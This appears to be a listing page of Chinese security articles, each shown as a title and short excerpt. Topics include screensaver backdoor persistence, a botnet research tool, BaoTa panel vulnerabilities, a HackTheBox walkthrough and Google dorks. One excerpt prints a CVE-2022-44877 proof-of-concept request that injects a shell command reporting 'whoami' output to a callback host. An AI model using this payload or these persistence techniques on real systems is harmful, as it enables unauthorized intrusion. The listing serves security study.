一、屏幕保护持久化屏幕保护应该都知道, 这里的利用方式十分简单, 就是替换屏幕保护程序为自己的后门程序实现的持久化。这个操作不需要高权限用户即可实现替换, 普通用户即可。注册表存在位置HKEY_CUR...
UBoat:一款功能强大的HTTP Botnet学习与研究工具
关于UBoatUBoat是一款功能强大的HTTP Botnet概念验证工具,该工具支持复刻一个现实场景中完整功能的Botnet测试环境,广大研究人员可以利用UBoat深入学习和研究Botnet的工作机...
【开工大吉】宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)
宝塔WAF防火墙最新版未授权访问漏洞+SQL 注入漏洞(已修复) 宝塔面板最新版安装 Linux面板8.0.5安装脚本 Centos安装脚本 yum install -y wget &&...
宝塔WAF防火墙未授权访问漏洞+SQL 注入漏洞(已修复)
宝塔WAF防火墙最新版未授权访问漏洞+SQL 注入漏洞(已修复) 宝塔面板最新版安装 Linux面板8.0.5安装脚本 Centos安装脚本 yum install -y wget &&...
【权限维持技术】Windows屏幕保护
免责声明本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。Windows屏幕保护屏幕保护是为了保护显示器而设...
【成功复现】WAGO系统远程代码执行漏洞(CVE-2023-1698)
网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责...
【HackTheBox系列】第六篇:中等难度之StreamIO(mssql注入、bloodhound、laps)
一、信息搜集题目提示如下:StreamIO is a medium machine that covers subdomain&n...
案例剖析:解决宝塔强制手机绑定问题的取证技巧与方法
随着互联网的快速发展,涉网犯罪案件屡见不鲜。为了从犯罪嫌疑人使用的网站服务器中提取证据,取证人员需要获取网站面板的后台数据库。本文以某执法机关成功查获的一起非法运营色情网站案为例,详细阐述了如何绕过宝...
Windows版宝塔bypass到RDP登录
声明本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!01 背景在一次攻防演练中,利用漏洞获取到一个webshell,站点是php的,最后发现这个webshell的权限竟然是s...
CVE-2022-44877 Control Web Panel Unauth RCE
POCPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host...
干货 | 漏洞赏金,Web安全和渗透测试的 常用Google语法
用于漏洞赏金、Web 应用程序安全和渗透测试的 Google Dorks 列表查找隐藏管理面板intitle:"admin panel" ——搜索页面标题中包含"admin panel"的页面。inu...
某塔强制绑定账号分析
前言: 某塔面板对于大家来说再熟悉不过了, 某塔面板是众多服务器管理软件中拥有友好的界面交互体验、功能完善且不断更新的一款产品。某塔面板做的就是一款简单好用的服务器管理软件。对于新手而言,不需要太多基...